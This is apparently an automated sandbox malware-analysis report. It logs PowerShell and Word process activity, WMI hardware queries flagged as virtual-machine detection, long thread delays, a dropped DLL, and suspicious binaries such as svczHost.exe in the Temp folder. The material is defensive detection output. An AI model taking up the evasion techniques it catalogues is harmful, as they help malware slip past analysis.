Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE			Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Source: C:\Windows\Temp\svczHost.exe	Memory allocated: 1B34BC80000 memory reserve \| memory write watch
Source: C:\Windows\Temp\myRdpService.exe	Memory allocated: 21A7E520000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9885	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9806	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9904	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9889
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9876
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9461
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9829
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9907
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6907

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496	Thread sleep count: 9885 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640	Thread sleep count: 9904 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676	Thread sleep count: 9876 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 9461 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 400 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816	Thread sleep count: 9829 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep count: 9907 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4664	Thread sleep count: 6907 > 30

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\net1.exe	Last function: Thread delayed
Source: C:\Windows\Temp\myRdpService.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000			Jump to behavior

Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000019.00000002.4318304566.000001F1C2D2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWoppingServiceStressedNonRecoverNo ContactLost CommStatusInfo
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapterXz
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: powershell.exe, 00000004.00000002.3761779223.000001EEB14B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapterXz
Source: powershell.exe, 0000001D.00000002.4377385393.0000012FE818B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlXz
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapterXz
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
